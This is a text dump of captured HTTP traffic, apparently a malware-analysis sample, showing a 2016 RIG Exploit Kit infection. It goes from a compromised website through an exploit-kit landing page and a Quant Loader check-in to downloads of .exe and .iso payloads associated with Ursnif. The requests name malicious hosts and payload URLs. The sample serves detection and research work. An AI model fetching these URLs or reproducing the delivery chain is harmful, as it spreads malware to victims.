Quant Loader and Ursnif malware from RIG Exploit Kit (EK): PCAP file download traffic analysis sample

2016-10-25 11:46:51.191792 IP 192.168.2.50.49192 > 192.232.206.125.80: Flags [P.], seq 1:249, ack 1, win 16537, length 248: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: scadradio.org
Connection: Keep-Alive

2016-10-25 11:46:51.364390 IP 192.232.206.125.80 > 192.168.2.50.49192: Flags [.], ack 249, win 123, length 0

2016-10-25 11:46:56.365015 IP 192.168.2.50.49211 > 176.223.111.82.80: Flags [P.], seq 1:458, ack 1, win 16537, length 457: HTTP: GET /?x3qJc7ieKxvGDIA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpPWqUOPYgJH-8SWELU6jQukzbMWd54ilRCF7jJVyLxLQFFd HTTP/1.1
GET /?x3qJc7ieKxvGDIA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpPWqUOPYgJH-8SWELU6jQukzbMWd54ilRCF7jJVyLxLQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://scadradio.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: po1289k.kremalopsi.gq
Connection: Keep-Alive


2016-10-25 11:47:23.483901 IP 192.168.2.50.49228 > 104.238.131.117.80: Flags [P.], seq 1:341, ack 1, win 16537, length 340: HTTP: GET /ioqmy6chaa/q/index.php?id=74400844&c=1&mk=319850 HTTP/1.1
GET /ioqmy6chaa/q/index.php?id=74400844&c=1&mk=319850 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: loremipsumdolorsitamet.pw
Connection: Keep-Alive

2016-10-25 11:47:23.601685 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [.], ack 341, win 980, length 0
2016-10-25 11:47:23.854582 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [P.], seq 1:347, ack 341, win 980, length 346: HTTP: HTTP/1.1 200 OK

2016-10-25 11:47:24.271842 IP 192.168.2.50.49229 > 82.165.174.205.80: Flags [P.], seq 1:310, ack 1, win 16537, length 309: HTTP: GET /img/381m6bv285.exe HTTP/1.1
GET /img/381m6bv285.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: institut-angeetbeaute.fr
Connection: Keep-Alive

2016-10-25 11:47:24.484048 IP 82.165.174.205.80 > 192.168.2.50.49229: Flags [.], seq 1:1351, ack 310, win 516, length 1350: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Content-Type: application/octet-stream

2016-10-25 11:48:01.761117 IP 192.168.2.50.49230 > 46.30.215.31.80: Flags [P.], seq 1:110, ack 1, win 64800, length 109: HTTP: GET /micha/fsa/zj47dn49.iso HTTP/1.1
GET /micha/fsa/zj47dn49.iso HTTP/1.1
Host: gingapura.de
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 11:48:01.941251 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], ack 110, win 29200, length 0
2016-10-25 11:48:01.942021 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], seq 1:1301, ack 110, win 29200, length 1300: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Tue, 25 Oct 2016 13:17:15 GMT

2016-10-25 11:48:21.713804 IP 192.168.2.50.49234 > 37.48.122.26.80: Flags [P.], seq 1:178, ack 1, win 16537, length 177: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0.0) Gecko/20100101 Firefox/40.0.0
Host: curlmyip.net
Connection: Keep-Alive
Cache-Control: no-cache